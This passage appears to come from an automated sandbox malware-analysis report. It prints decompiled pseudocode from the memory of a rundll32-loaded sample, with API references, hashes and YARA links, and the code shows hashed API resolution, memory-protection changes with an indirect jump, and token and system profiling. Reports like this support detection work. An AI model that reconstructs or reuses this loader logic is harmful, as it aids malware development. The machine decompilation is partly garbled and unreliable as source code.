				_v124 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
				_t155 = DisableThreadLibraryCalls(??);
				_t272 = _t271 - 4;
				_t229 =  *_v104;
				_v156 = _t155;
				_v116 = _t229;
				_v120 = _v72;
				if(_t229 != 0) {
					_v120 = _v72 + (_v116 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t240 = _v48;
				_v44 =  *((intOrPtr*)(_t240 + 0x20));
				_v40 =  *((intOrPtr*)(_t240 + 0x18));
				_v36 =  *((intOrPtr*)(_t240 + 0x34));
				_v32 =  *((intOrPtr*)(_t240 + 0x30));
				_v28 =  *_t240;
				_v24 = _v124;
				 *_t272 = _t240;
				_v184 = 0;
				_v180 = 0x74;
				_v128 =  *((intOrPtr*)(_v120 + 0x28));
				_v132 = 0;
				_v136 = 0x74;
				_v140 =  &_v44;
				E008F2569();
				if(_v128 != 0) {
					_t272 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x008f221f
0x008f222d
0x008f2234
0x008f2237
0x008f2241
0x008f2248
0x008f2252
0x008f2258
0x008f2261
0x008f226a
0x008f226d
0x008f2273
0x008f2277
0x008f227f
0x008f2283
0x008f2286
0x008f2289
0x008f228c
0x008f228f
0x008f22a9
0x008f22af
0x008f22b2
0x008f22ba
0x008f22be
0x008f22c1
0x008f22c4
0x008f22c7
0x008f22ca
0x008f22e6
0x008f2303
0x008f2328
0x008f232a
0x008f2333
0x008f2336
0x008f2340
0x008f2343
0x008f2346
0x008f2349
0x008f234c
0x008f23a4
0x008f23a4
0x008f254a
0x008f2550
0x008f244d
0x008f2453
0x008f249f
0x008f249f
0x008f24bc
0x008f24e2
0x008f24f0
0x008f24f3
0x008f24f7
0x008f24fb
0x008f2502
0x008f2508
0x008f250a
0x008f251c
0x008f2524
0x008f252a
0x008f2530
0x008f2536
0x00000000
0x00000000
0x008f253c
0x008f249f
0x008f245b
0x008f2469
0x008f2471
0x008f2474
0x008f2476
0x008f247c
0x008f2488
0x008f248e
0x008f2491
0x008f2494
0x008f238a
0x008f238a
0x008f23d8
0x008f23de
0x008f23e4
0x008f23ea
0x008f23f0
0x008f23f5
0x008f23fb
0x008f23fe
0x008f2401
0x008f2409
0x008f2411
0x008f2414
0x008f2417
0x008f241d
0x008f2423
0x008f242e
0x008f2362
0x008f2368
0x008f2368
0x008f23c5

APIs

VirtualProtect.KERNELBASE ref: 008F228F
VirtualProtect.KERNELBASE ref: 008F2328

Strings

t, xrefs: 008F2409

Memory Dump Source

Source File: 00000001.00000002.677623801.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: t
API String ID: 544645111-2238339752
Opcode ID: e3564e4078585a4244901c8b2cfec8fab8e5a23418319834df12e8637fdc61a7
Instruction ID: 0fa1fc9725c8f8201267b4e5d5081d51c5b2d068c46988a7f6b0787bdf863f3a
Opcode Fuzzy Hash: e3564e4078585a4244901c8b2cfec8fab8e5a23418319834df12e8637fdc61a7
Instruction Fuzzy Hash: 59818BB4D042089FCB04DFA9C580AADFBF1FF88310F65856AE958AB361D734A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 008F2439, Relevance: 1.6, APIs: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 008F2508

Memory Dump Source

Source File: 00000001.00000002.677623801.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 5e097bf357fc3c48951063afd9944eb8096ac7311da5801245bd3e9a3218a1c6
Instruction ID: 49b1f0c958ed58f80a1a342dec53c8bf52b566940a10f29ebc2c836fc829b41f
Opcode Fuzzy Hash: 5e097bf357fc3c48951063afd9944eb8096ac7311da5801245bd3e9a3218a1c6
Instruction Fuzzy Hash: F031D6B5D002288FDB14CF68C980A9DB7F1FF98304F25829AD949A7346D731AE41CF81

Uniqueness

Uniqueness Score: -1.00%

Function 008F1D89, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 008F1EA8

Memory Dump Source

Source File: 00000001.00000002.677623801.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction ID: ae99cb1c7cb6a0dd113c1e96bc8b0328c9147e9e906abf47c64b8365438e57a3
Opcode Fuzzy Hash: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction Fuzzy Hash: 3141C0B5E052198FDB04DFA8C4946AEBBF1FF48714F15852AE948AB340D735A8408F95

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 6608 Parent PID: 6560 rundll32.exeCOMMON

Executed Functions

Function 709907CC, Relevance: 5.1, APIs: 3, Instructions: 628
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E709907CC(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _t152;
				void* _t155;
				signed char* _t156;
				char _t159;
				intOrPtr* _t163;
				void* _t177;
				intOrPtr _t186;
				char _t187;
				void* _t192;
				void* _t196;
				void* _t198;
				void* _t199;
				void* _t202;
				void* _t208;
				void* _t209;
				void* _t211;
				void* _t212;
				void* _t219;
				void* _t232;
				void* _t234;
				void* _t237;
				void* _t240;
				void* _t243;
				void* _t246;
				void* _t250;
				void* _t254;
				void* _t255;
				void* _t257;
				long _t258;
				void* _t261;
				void* _t264;
				int _t267;
				void* _t268;
				void* _t272;
				void* _t273;
				void* _t274;
				void* _t278;
				int _t280;
				intOrPtr* _t284;
				signed char _t288;
				signed char _t289;
				signed int _t293;
				void* _t314;
				void* _t319;
				void* _t355;
				void* _t364;
				void* _t369;
				void* _t374;
				void* _t375;
				void* _t376;
				void* _t377;
				void* _t378;
				void* _t379;
				void* _t385;
				void* _t392;
				signed int _t397;
				intOrPtr* _t400;
				void* _t403;
				signed int _t405;
				void* _t407;
				void* _t408;
				void* _t413;
				intOrPtr* _t417;
				void* _t419;
				void** _t421;
				void* _t422;
				void* _t423;
				void* _t424;

				_push(__esi);
				_push(__edi);
				_push(__ebx);
				_t423 = _t422 - 0x1e0;
				_t407 = __ecx;
				_t152 =  *0x7099d1f8;
				if(_t152 == 0x16a9e13a) {
					_t152 = E70993558(0x30);
					 *0x7099d1f8 = _t152;
				}
				if( *((char*)(_t152 + 0xb)) == 0 || _t407 != 0) {
					_t408 = _t423 + 0x48;
					E709935D4(_t408, 0, 0x11c);
					_t424 = _t423 + 0xc;
					 *((intOrPtr*)(_t424 + 0x48)) = 0x11c;
					_t155 = E70992F94(0x4bcc7cba, 0xa7920a3, 0x4bcc7cba, 0x4bcc7cba);
					if(_t155 == 0) {
						_t395 =  *0x7099d1f8;
						_t156 = _t424 + 0x4c;
						_t288 =  *_t156;
						 *(_t395 + 8) = _t288;
						_t289 = _t156[4];
						 *(_t395 + 9) = _t289;
						__eflags = _t156[0x116] - 1;
						_t389 =  *(_t424 + 0x54);
						 *((char*)(_t395 + 0xa)) = _t156[0x110];
						 *(_t395 + 4) =  *(_t424 + 0x54);
						 *((char*)(_t395 + 0xc)) = 0 | _t156[0x116] != 0x00000001;
						 *_t395 = (_t289 & 0x000000ff) + ((_t288 & 0x000000ff) << 4) - 0x50;
						_t159 = E70991094(_t395);
						 *(_t424 + 0x198) = 0;
						 *((char*)( *0x7099d1f8 + 0xb)) = _t159;
						_t355 = E70992F94(0xd0443458, 0xd8ece5ad, _t159, _t159);
						__eflags = _t355;
						if(_t355 == 0) {
							L12:
							__eflags = 0;
							 *((char*)( *0x7099d1f8 + 0x28)) = 0;
							_t163 = E709907CC(0x7099d1f8, 0, _t389, _t395);
							__eflags =  *_t163 - 0x10;
							if( *_t163 >= 0x10) {
								_t293 = 6;
								memcpy(_t424 + 0x164, 0x7099bc80, _t293 << 2);
								_t424 = _t424 + 0xc;
								_t392 = 0x7099bc80 + _t293 + _t293;
								 *((intOrPtr*)(_t424 + 0x1c)) = 0;
								E7098F620(_t424 + 0x24, 0);
								_t397 = 0;
								__eflags = 0;
								do {
									E7098F8C4(_t424 + 0x24, E7098F568(_t424 + 0x20) + 4);
									 *((intOrPtr*)(E7098F558(_t424 + 0x24, E7098F568(_t424 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t424 + 0x164 + _t397 * 4));
									_t397 = _t397 + 1;
									 *((intOrPtr*)(_t424 + 0x1c)) =  *((intOrPtr*)(_t424 + 0x1c)) + 1;
									__eflags = _t397 - 6;
								} while (_t397 < 6);
								_push(0);
								E709954EC(_t424 + 0xc, _t424 + 0x1c, 0x80000002);
								E7098F6F0(_t424 + 0x20);
								E7099551C(_t424 + 8, _t424 + 0x1c0, 0x5411b30);
								_t177 = E709957D0(_t424 + 4, __eflags,  *((intOrPtr*)(_t424 + 0x1c0)));
								_t398 = _t177;
								E7098E054(_t424 + 0x1c0);
								__eflags = _t177;
								if(_t177 != 0) {
									E7099551C(_t424 + 8, _t424 + 0x1c8, 0xdb1d9b48);
									_t413 = E709957D0(_t424 + 4, __eflags,  *((intOrPtr*)(_t424 + 0x1c8)));
									E7098E054(_t424 + 0x1c8);
									_t398 = _t424 + 0x1d0;
									E7099551C(_t424 + 8, _t424 + 0x1d0, 0xf3453dd0);
									_t392 = E709957D0(_t424 + 4, __eflags,  *(_t424 + 0x1d0));
									E7098E054(_t424 + 0x1d0);
									__eflags = _t413;
									if(_t413 != 0) {
										__eflags = _t413 - 5;
										if(_t413 != 5) {
											__eflags = _t413 - 2;
											if(_t413 != 2) {
												goto L58;
											} else {
												__eflags = _t392 - 1;
												if(_t392 != 1) {
													goto L58;
												} else {
													E7098D098(_t424 + 0xc);
													__eflags =  *((char*)(_t424 + 8));
													if( *((char*)(_t424 + 8)) != 0) {
														_t375 =  *(_t424 + 4);
														__eflags = _t375;
														if(_t375 == 0) {
															L53:
															_t237 = 1;
														} else {
															__eflags = _t375 - 0xffffffff;
															if(_t375 != 0xffffffff) {
																_t237 = 0;
																__eflags = 0;
															} else {
																goto L53;
															}
														}
														__eflags = _t237;
														if(_t237 == 0) {
															E709954C4(_t375);
														}
													}
													 *(_t424 + 4) = 0;
													_t186 = 5;
												}
											}
										} else {
											__eflags = _t392;
											if(_t392 != 0) {
												__eflags = _t392 - 1;
												if(_t392 == 1) {
													E7098D098(_t424 + 0xc);
													__eflags =  *((char*)(_t424 + 8));
													if( *((char*)(_t424 + 8)) != 0) {
														_t376 =  *(_t424 + 4);
														__eflags = _t376;
														if(_t376 == 0) {
															L108:
															_t240 = 1;
														} else {
															__eflags = _t376 - 0xffffffff;
															if(_t376 != 0xffffffff) {
																_t240 = 0;
																__eflags = 0;
															} else {
																goto L108;
															}
														}
														__eflags = _t240;
														if(_t240 == 0) {
															E709954C4(_t376);
														}
													}
													 *(_t424 + 4) = 0;
													_t186 = 4;
												} else {
													goto L58;
												}
											} else {
												E7098D098(_t424 + 0xc);
												__eflags =  *((char*)(_t424 + 8));
												if( *((char*)(_t424 + 8)) != 0) {
													_t377 =  *(_t424 + 4);
													__eflags = _t377;
													if(_t377 == 0) {
														L41:
														_t243 = 1;
													} else {
														__eflags = _t377 - 0xffffffff;
														if(_t377 != 0xffffffff) {
															_t243 = 0;
															__eflags = 0;
														} else {
															goto L41;
														}
													}
													__eflags = _t243;
													if(_t243 == 0) {
														E709954C4(_t377);
													}
												}
												 *(_t424 + 4) = 0;
												_t186 = 3;
											}
										}
									} else {
										__eflags = _t392;
										if(_t392 != 0) {
											L58:
											E7098D098(_t424 + 0xc);
											__eflags =  *((char*)(_t424 + 8));
											if( *((char*)(_t424 + 8)) != 0) {
												_t374 =  *(_t424 + 4);
												__eflags = _t374;
												if(_t374 == 0) {
													L61:
													_t234 = 1;
												} else {
													__eflags = _t374 - 0xffffffff;
													if(_t374 != 0xffffffff) {
														_t234 = 0;
														__eflags = 0;
													} else {
														goto L61;
													}
												}
												__eflags = _t234;
												if(_t234 == 0) {
													E709954C4(_t374);
												}
											}
											_t186 = 0;
											__eflags = 0;
											 *(_t424 + 4) = 0;
										} else {
											E7098D098(_t424 + 0xc);
											__eflags =  *((char*)(_t424 + 8));
											if( *((char*)(_t424 + 8)) != 0) {
												_t378 =  *(_t424 + 4);
												__eflags = _t378;
												if(_t378 == 0) {
													L31:
													_t246 = 1;
												} else {
													__eflags = _t378 - 0xffffffff;
													if(_t378 != 0xffffffff) {
														_t246 = 0;
														__eflags = 0;
													} else {
														goto L31;
													}
												}
												__eflags = _t246;
												if(_t246 == 0) {
													E709954C4(_t378);
												}
											}
											 *(_t424 + 4) = 0;
											_t186 = 2;
										}
									}
								} else {
									E7098D098(_t424 + 0xc);
									__eflags =  *((char*)(_t424 + 8));
									if( *((char*)(_t424 + 8)) != 0) {
										_t379 =  *(_t424 + 4);
										__eflags = _t379;
										if(_t379 == 0) {
											L21:
											_t250 = 1;
										} else {
											__eflags = _t379 - 0xffffffff;
											if(_t379 != 0xffffffff) {
												_t250 = 0;
												__eflags = 0;
											} else {
												goto L21;
											}
										}
										__eflags = _t250;
										if(_t250 == 0) {
											E709954C4(_t379);
										}
									}
									 *(_t424 + 4) = 0;
									_t186 = 1;
								}
							} else {
								_t186 = 1;
							}
							 *((intOrPtr*)( *0x7099d1f8 + 0x24)) = _t186;
							_t187 = E709910CC(0xffffffffffffffff);
							_t314 =  *0x7099d1f8;
							 *((char*)(_t314 + 0x29)) = _t187;
							__eflags =  *_t314 - 0x10;
							 *((intOrPtr*)(_t314 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t314 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x7099d1f8 + 0x2c)) = E70991140(0xffffffffffffffff, _t392, _t398);
								goto L78;
							} else {
								 *(_t424 + 0x19c) = 0;
								_t364 = E70992F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
								__eflags = _t364;
								if(_t364 == 0) {
									L74:
									_t196 =  *0x7099d1f8;
									__eflags =  *((char*)(_t196 + 0x28));
									if( *((char*)(_t196 + 0x28)) == 0) {
										 *((intOrPtr*)(_t196 + 0x2c)) = 3;
									} else {
										 *((intOrPtr*)(_t196 + 0x2c)) = 5;
									}
									goto L78;
								} else {
									_t198 =  *_t364(0xffffffff, 8, _t424 + 0x19c);
									__eflags = _t198;
									if(_t198 == 0) {
										_t199 = E7099352C(_t398);
										__eflags = _t199;
										if(_t199 != 0) {
											goto L74;
										} else {
											goto L69;
										}
									} else {
										L69:
										 *(_t424 + 0x30) =  *(_t424 + 0x19c);
										 *((char*)(_t424 + 0x34)) = 1;
										 *(_t424 + 0x1a4) = 0;
										_t319 = E70992F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
										__eflags = _t319;
										if(_t319 != 0) {
											_t232 =  *_t319( *(_t424 + 0x1ac), 1, 0, 0, _t424 + 0x1a4);
											__eflags = _t232;
											if(_t232 == 0) {
												E7099352C(_t398);
											}
										}
										_t202 =  *(_t424 + 0x1a4);
										__eflags = _t202;
										if(_t202 != 0) {
											E7098F620(_t424 + 0x18c, _t202);
											_t403 = E70992F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
											__eflags = _t403;
											if(_t403 == 0) {
												L124:
												E7098F6F0(_t424 + 0x188);
												goto L72;
											} else {
												_t208 = E7098F558(_t424 + 0x18c, 0);
												_t209 = E7098F568(_t424 + 0x188);
												_t211 =  *_t403( *(_t424 + 0x1ac), 1, _t208, _t209, _t424 + 0x1a4);
												__eflags = _t211;
												if(_t211 == 0) {
													_t212 = E7099352C(_t403);
													__eflags = _t212;
													if(_t212 != 0) {
														goto L124;
													} else {
														goto L116;
													}
												} else {
													L116:
													_t417 = E7098F558(_t424 + 0x18c, 0);
													E7098DFFC(_t424 + 0x1b4, 0);
													 *(_t424 + 0x1ac) = 0;
													_t369 = E70992F94(0xd0443458, 0x39521505, 0xd0443458, 0xd0443458);
													__eflags = _t369;
													if(_t369 != 0) {
														 *_t369( *_t417, _t424 + 0x1ac);
													}
													E7098E070(_t424 + 0x1b4,  *(_t424 + 0x1ac));
													_t219 = E70992F94(0x4bcc7cba, 0x1f221433, 0x4bcc7cba, 0x4bcc7cba);
													__eflags = _t219;
													if(_t219 == 0) {
														E7098E11C(_t424 + 0x1b8 - 8, _t424 + 0x1b8);
														_t419 = E70994BE0( *((intOrPtr*)(_t424 + 0x1b8)), E7098E94C( *((intOrPtr*)(_t424 + 0x1b8)), 0x7fffffff));
														E7098E054(_t424 + 0x1b8);
														E7098E054(_t424 + 0x1b0);
														E7098F6F0(_t424 + 0x188);
														__eflags =  *((char*)(_t424 + 0x34));
														if( *((char*)(_t424 + 0x34)) != 0) {
															E7098BC00(_t424 + 0x30);
														}
														__eflags = _t419 - 0x6df4cf7;
														if(_t419 != 0x6df4cf7) {
															goto L74;
														} else {
															 *((intOrPtr*)( *0x7099d1f8 + 0x2c)) = 6;
															L78:
															_t192 = E70992F94(0x4bcc7cba, 0x57154e4e, 0x4bcc7cba, 0x4bcc7cba);
															__eflags = _t192;
															if(_t192 != 0) {
																GetSystemInfo(_t424 + 0x164); // executed
															}
															_t152 =  *0x7099d1f8;
															_t284 = _t424 + 0x178;
															_t400 = _t424 + 0x170;
															 *((short*)(_t152 + 0xe)) =  *_t284;
															 *((intOrPtr*)(_t152 + 0x10)) =  *((intOrPtr*)(_t284 - 0x10));
															 *((intOrPtr*)(_t152 + 0x14)) =  *((intOrPtr*)(_t284 - 0xc));
															 *((intOrPtr*)(_t152 + 0x18)) =  *_t400;
															 *((intOrPtr*)(_t152 + 0x1c)) =  *((intOrPtr*)(_t400 + 0x10));
															goto L81;
														}
													} else {
														_push( *(_t424 + 0x1ac));
														asm("int3");
														return _t219;
													}
												}
											}
										} else {
											L72:
											__eflags =  *((char*)(_t424 + 0x34));
											if( *((char*)(_t424 + 0x34)) != 0) {
												E7098BC00(_t424 + 0x30);
											}
											goto L74;
										}
									}
								}
							}
						} else {
							_t254 =  *_t355(0xffffffff, 8, _t424 + 0x198);
							__eflags = _t254;
							if(_t254 == 0) {
								_t255 = E7099352C(_t395);
								__eflags = _t255;
								if(_t255 != 0) {
									goto L12;
								} else {
									goto L7;
								}
							} else {
								L7:
								 *(_t424 + 0x14) =  *(_t424 + 0x198);
								 *((char*)(_t424 + 0x18)) = 1;
								 *(_t424 + 0x1a0) = 0;
								_t257 = E70992F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
								__eflags = _t257;
								if(_t257 != 0) {
									_t280 = GetTokenInformation( *(_t424 + 0x1a8), 2, 0, 0, _t424 + 0x1a0); // executed
									__eflags = _t280;
									if(_t280 == 0) {
										E7099352C(_t395);
									}
								}
								_t258 =  *(_t424 + 0x1a0);
								__eflags = _t258;
								if(_t258 != 0) {
									E7098F620(_t424 + 0x3c, _t258);
									_t261 = E70992F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
									_t395 = _t261;
									__eflags = _t261;
									if(_t261 == 0) {
										L98:
										E7098F6F0(_t424 + 0x38);
										goto L10;
									} else {
										_t264 = E7098F558(_t424 + 0x3c, 0);
										_t267 = GetTokenInformation( *(_t424 + 0x1a8), 2, _t264, E7098F568(_t424 + 0x38), _t424 + 0x1a0); // executed
										__eflags = _t267;
										if(_t267 == 0) {
											_t268 = E7099352C(_t395);
											__eflags = _t268;
											if(_t268 != 0) {
												goto L98;
											} else {
												goto L85;
											}
										} else {
											L85:
											_t421 = E7098F558(_t424 + 0x3c, 0);
											_t389 = _t424 + 0x1d8;
											 *(_t424 + 0x1d8 - 0x30) = 0;
											asm("movsd");
											asm("movsb");
											asm("movsb");
											_t395 = E70992F94(0xd0443458, 0xe6199b6e, 0xd0443458, 0xd0443458);
											__eflags = _t395;
											if(_t395 == 0) {
												goto L98;
											} else {
												_t272 = _t424 + 0x1a8;
												_t273 =  *_t395(_t272 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t272);
												__eflags = _t273;
												if(_t273 == 0) {
													_t274 = E7099352C(_t395);
													__eflags = _t274;
													if(_t274 != 0) {
														goto L98;
													} else {
														goto L87;
													}
												} else {
													L87:
													_t389 =  *(_t424 + 0x1a8);
													__eflags =  *_t421;
													if( *_t421 <= 0) {
														L92:
														__eflags = _t389;
														if(_t389 == 0) {
															L94:
															_t385 = 1;
														} else {
															__eflags = _t389 - 0xffffffff;
															if(_t389 != 0xffffffff) {
																_t385 = 0;
																__eflags = 0;
															} else {
																goto L94;
															}
														}
														__eflags = _t385;
														if(_t385 == 0) {
															E70991070(_t389, _t395, _t389);
														}
														goto L98;
													} else {
														_t405 = 0;
														__eflags = 0;
														while(1) {
															_t278 = E70992F94(0xd0443458, 0x713d44b5, 0xd0443458, 0xd0443458);
															__eflags = _t278;
															if(_t278 != 0) {
																break;
															}
															_t405 = _t405 + 1;
															__eflags = _t405 -  *_t421;
															if(_t405 <  *_t421) {
																continue;
															} else {
																goto L92;
															}
															goto L130;
														}
														_push( *((intOrPtr*)(_t421 + 4 + _t405 * 8)));
														_push( *(_t424 + 0x1ac));
														asm("int3");
														return _t278;
													}
												}
											}
										}
									}
								} else {
									L10:
									__eflags =  *((char*)(_t424 + 0x18));
									if( *((char*)(_t424 + 0x18)) != 0) {
										E7098BC00(_t424 + 0x14);
									}
									goto L12;
								}
							}
						}
					} else {
						_push(_t408);
						asm("int3");
						return _t155;
					}
				} else {
					L81:
					return _t152;
				}
				L130:
			}

0x709907cc
0x709907cd
0x709907ce
0x709907d0
0x709907db
0x709907dd
0x709907e4
0x70991063
0x70991069
0x70991069
0x709907ee
0x709907fa
0x70990806
0x7099080b
0x70990818
0x70990822
0x70990829
0x7099082e
0x70990832
0x70990836
0x7099083b
0x7099083e
0x70990844
0x7099084a
0x70990857
0x7099085e
0x70990865
0x70990868
0x7099086b
0x7099086d
0x70990879
0x70990886
0x70990893
0x70990895
0x70990897
0x70990923
0x70990923
0x70990929
0x7099092c
0x70990931
0x70990934
0x7099094c
0x7099094d
0x7099094d
0x7099094d
0x70990951
0x7099095a
0x7099095f
0x7099095f
0x70990961
0x70990972
0x70990994
0x70990996
0x70990997
0x7099099b
0x7099099b
0x709909a4
0x709909b0
0x709909b9
0x709909cf
0x709909df
0x709909e4
0x709909e8
0x709909ed
0x709909ef
0x70990a3f
0x70990a54
0x70990a58
0x70990a5d
0x70990a6e
0x70990a83
0x70990a87
0x70990a8c
0x70990a8e
0x70990ad5
0x70990ad8
0x70990b26
0x70990b29
0x00000000
0x70990b2b
0x70990b2b
0x70990b2e
0x00000000
0x70990b30
0x70990b34
0x70990b39
0x70990b3e
0x70990b40
0x70990b44
0x70990b46
0x70990b4d
0x70990b4d
0x70990b48
0x70990b48
0x70990b4b
0x70990b51
0x70990b51
0x00000000
0x00000000
0x00000000
0x70990b4b
0x70990b53
0x70990b55
0x70990b58
0x70990b58
0x70990b55
0x70990b5d
0x70990b67
0x70990b67
0x70990b2e
0x70990ada
0x70990ada
0x70990adc
0x70990b1b
0x70990b1e
0x70990e90
0x70990e95
0x70990e9a
0x70990e9c
0x70990ea0
0x70990ea2
0x70990ea9
0x70990ea9
0x70990ea4
0x70990ea4
0x70990ea7
0x70990ead
0x70990ead
0x00000000
0x00000000
0x00000000
0x70990ea7
0x70990eaf
0x70990eb1
0x70990eb4
0x70990eb4
0x70990eb1
0x70990eb9
0x70990ec3
0x70990b24
0x00000000
0x70990b24
0x70990ade
0x70990ae2
0x70990ae7
0x70990aec
0x70990aee
0x70990af2
0x70990af4
0x70990afb
0x70990afb
0x70990af6
0x70990af6
0x70990af9
0x70990aff
0x70990aff
0x00000000
0x00000000
0x00000000
0x70990af9
0x70990b01
0x70990b03
0x70990b06
0x70990b06
0x70990b03
0x70990b0b
0x70990b15
0x70990b15
0x70990adc
0x70990a90
0x70990a90
0x70990a92
0x70990b6a
0x70990b6e
0x70990b73
0x70990b78
0x70990b7a
0x70990b7e
0x70990b80
0x70990b87
0x70990b87
0x70990b82
0x70990b82
0x70990b85
0x70990b8b
0x70990b8b
0x00000000
0x00000000
0x00000000
0x70990b85
0x70990b8d
0x70990b8f
0x70990b92
0x70990b92
0x70990b8f
0x70990b97
0x70990b97
0x70990b99
0x70990a98
0x70990a9c
0x70990aa1
0x70990aa6
0x70990aa8
0x70990aac
0x70990aae
0x70990ab5
0x70990ab5
0x70990ab0
0x70990ab0
0x70990ab3
0x70990ab9
0x70990ab9
0x00000000
0x00000000
0x00000000
0x70990ab3
0x70990abb
0x70990abd
0x70990ac0
0x70990ac0
0x70990abd
0x70990ac5
0x70990acf
0x70990acf
0x70990a92
0x709909f1
0x709909f5
0x709909fa
0x709909ff
0x70990a01
0x70990a05
0x70990a07
0x70990a0e
0x70990a0e
0x70990a09
0x70990a09
0x70990a0c
0x70990a12
0x70990a12
0x00000000
0x00000000
0x00000000
0x70990a0c
0x70990a14
0x70990a16
0x70990a19
0x70990a19
0x70990a16
0x70990a1e
0x70990a28
0x70990a28
0x70990936
0x70990938
0x70990938
0x70990ba2
0x70990ba5
0x70990baa
0x70990bac
0x70990bb5
0x70990bc1
0x70990bc4
0x70990c92
0x70990c9a
0x00000000
0x70990bca
0x70990bd4
0x70990be6
0x70990be8
0x70990bea
0x70990c76
0x70990c76
0x70990c78
0x70990c7c
0x70990c87
0x70990c7e
0x70990c7e
0x70990c7e
0x00000000
0x70990bf0
0x70990bfc
0x70990bfe
0x70990c00
0x7099104f
0x70991054
0x70991056
0x00000000
0x7099105c
0x00000000
0x7099105c
0x70990c06
0x70990c06
0x70990c17
0x70990c1b
0x70990c20
0x70990c32
0x70990c34
0x70990c36
0x70990c4d
0x70990c4f
0x70990c51
0x70990ec9
0x70990ec9
0x70990c51
0x70990c57
0x70990c5e
0x70990c60
0x70990edb
0x70990ef1
0x70990ef3
0x70990ef5
0x70991030
0x70991037
0x00000000
0x70990efb
0x70990f04
0x70990f12
0x70990f2c
0x70990f2e
0x70990f30
0x70991041
0x70991046
0x70991048
0x00000000
0x7099104a
0x00000000
0x7099104a
0x70990f36
0x70990f36
0x70990f44
0x70990f4f
0x70990f5e
0x70990f70
0x70990f72
0x70990f74
0x70990f81
0x70990f81
0x70990f91
0x70990fa2
0x70990fa7
0x70990fa9
0x70990fbf
0x70990fe0
0x70990fe9
0x70990ff5
0x70991001
0x70991006
0x7099100b
0x70991011
0x70991011
0x70991016
0x7099101c
0x00000000
0x70991022
0x70991024
0x70990c9d
0x70990ca9
0x70990cb0
0x70990cb2
0x70990cbc
0x70990cbc
0x70990cbe
0x70990cc0
0x70990ccf
0x70990cdb
0x70990cdf
0x70990ce2
0x70990ce5
0x70990ce8
0x00000000
0x70990ce8
0x70990fab
0x70990fab
0x70990fb2
0x70990fb3
0x70990fb3
0x70990fa9
0x70990f30
0x70990c66
0x70990c66
0x70990c66
0x70990c6b
0x70990c71
0x70990c71
0x00000000
0x70990c6b
0x70990c60
0x70990c00
0x70990bea
0x7099089d
0x709908a9
0x709908ab
0x709908ad
0x70990e7a
0x70990e7f
0x70990e81
0x00000000
0x70990e87
0x00000000
0x70990e87
0x709908b3
0x709908b3
0x709908c4
0x709908c8
0x709908cd
0x709908da
0x709908e1
0x709908e3
0x709908fa
0x709908fc
0x709908fe
0x70990cf6
0x70990cf6
0x709908fe
0x70990904
0x7099090b
0x7099090d
0x70990d05
0x70990d16
0x70990d1b
0x70990d1d
0x70990d1f
0x70990e50
0x70990e54
0x00000000
0x70990d25
0x70990d2b
0x70990d50
0x70990d52
0x70990d54
0x70990e6c
0x70990e71
0x70990e73
0x00000000
0x70990e75
0x00000000
0x70990e75
0x70990d5a
0x70990d5a
0x70990d65
0x70990d6c
0x70990d73
0x70990d7a
0x70990d7b
0x70990d7c
0x70990d8e
0x70990d90
0x70990d92
0x00000000
0x70990d98
0x70990d9a
0x70990db5
0x70990db7
0x70990db9
0x70990e5e
0x70990e63
0x70990e65
0x00000000
0x70990e67
0x00000000
0x70990e67
0x70990dbf
0x70990dbf
0x70990dbf
0x70990dc6
0x70990dca
0x70990e35
0x70990e35
0x70990e37
0x70990e3e
0x70990e3e
0x70990e39
0x70990e39
0x70990e3c
0x70990e42
0x70990e42
0x00000000
0x00000000
0x00000000
0x70990e3c
0x70990e44
0x70990e46
0x70990e4b
0x70990e4b
0x00000000
0x70990dcc
0x70990dcc
0x70990dcc
0x70990dce
0x70990dda
0x70990ddf
0x70990de1
0x00000000
0x00000000
0x70990e2f
0x70990e30
0x70990e33
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x70990e33
0x70990de3
0x70990de7
0x70990dee
0x70990def
0x70990def
0x70990dca
0x70990db9
0x70990d92
0x70990d54
0x70990913
0x70990913
0x70990913
0x70990918
0x7099091e
0x7099091e
0x00000000
0x70990918
0x7099090d
0x709908ad
0x7099082b
0x7099082b
0x7099082c
0x7099082d
0x7099082d
0x70990ceb
0x70990ceb
0x70990cf5
0x70990cf5
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,D0443458,D0443458), ref: 709908FA
GetSystemInfo.KERNELBASE(?,4BCC7CBA,4BCC7CBA,?,?,F3453DD0,?,?,DB1D9B48,?,?,05411B30,00000000,80000002,00000000,-000000FC), ref: 70990CBC
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,D0443458,D0443458,00000000,D0443458,D0443458), ref: 70990D50

Memory Dump Source

